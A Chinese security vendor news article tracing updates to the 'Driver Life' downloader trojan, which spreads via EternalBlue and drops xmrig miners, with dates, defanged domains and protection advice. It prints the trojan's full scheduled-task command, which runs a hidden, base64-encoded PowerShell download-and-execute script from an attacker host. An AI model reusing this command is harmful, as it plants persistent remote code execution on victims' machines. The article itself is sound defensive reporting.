首页 > 安全资讯 > 正文

永恒之蓝下载器木马再度更新!

根据360网络安全研究院提供的线索,通过驱动人生升级通道下发并通过“永恒之蓝”传播的下载器木马在2018年年末再次进行更新。2018年12月29日之后,该木马通过hxxp://d.haqo.net下发挖矿木马xmrig-32.mlz或xmrig-64.mlz。

“驱动人生”下载器木马再次更新

hxxp://d.haqo.net这个域名是从2018年12月29日开始解析的,之后就一直作为挖矿木马的下载地址存在。在此之前,下载器木马一直通过hxxp://dl.haqo.net下发“永恒之蓝“传播模块。显而易见,攻击者手里已经控制了大量肉鸡,认为下发挖矿木马牟利的时机已经成熟。

值得一提的是,挖矿木马连接的矿池域名的其中两个域名loop.haqo.net和loop2.haqo.net 在2018年12月15日就开始解析(12月15日是驱动人生升级通道劫持攻击爆发的第二天),也就是说攻击者早就预谋要通过挖矿牟利,但由于各安全厂商的预警导致攻击者将这一计划推迟了半个月。

“驱动人生”下载器木马前情提要

  • 2018年12月14日 下午

360互联网安全中心监控到一批通过 “人生日历”升级组件下发的下载器木马,该木马具备远程代码执行功能。木马启动后会将用户计算机的详细信息发往木马服务器,并接收远程指令执行下一步操作,木马同时还携带有永恒之蓝漏洞攻击组件,通过永恒之蓝漏洞攻击局域网与互联网中其它机器。360安全卫士已在第一时间查杀该木马, 360安全卫士具备永恒之蓝漏洞免疫功能,使用360安全卫士的用户不受该木马影响。我们也在第一时间将情况提交厂商处理。

“驱动人生”下载器木马再次更新

  • 2018年12月19日 上午

“永恒之蓝”下载器木马再次更新。此次更新通过服务器调整云控指令,实现对木马下载模块的更新,这也体现出了此类下载器木马的灵活性—可随时更新木马组件。下图是新的攻击模块下载地址:

“驱动人生”下载器木马再次更新

更新的文件为14日的“永恒之蓝”漏洞攻击组件,保留了之前永恒之蓝漏洞攻击的模块,新增加一个powershell后门,同时更新了木马程序落地的名称。

其中powershell的后门通过注册一个计划任务实现:

命令行:C:WINDOWSsystem32cmd.exe /c schtasks /create /ru system /sc MINUTE /mo 50 /st 07:05:00 /tn "MicrosoftwindowsBluetooths" /tr "powershell -nop -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AcgAuAG0AaQBuAGkAYwBlAG4ALgBnAGEALwByAD8AcAAnACkA" /F

解码之后,利用powershell执行这一段脚本:'hxxp://r.minicen.ga/r?p'

那时这个域名刚刚注册,并没有做解析

“驱动人生”下载器木马再次更新

安全专家建议

为保证用户使用电脑的安全,我们建议您使用安全软件,并在使用电脑时保持安全软件处于开启状态,对电脑实时防护。

此外,360安全卫士接入安全大脑后,对此类木马及其后门可在第一时间提供预警,防护和查杀,守护您的安全。


360安全卫士

热点排行

用户
反馈
返回
顶部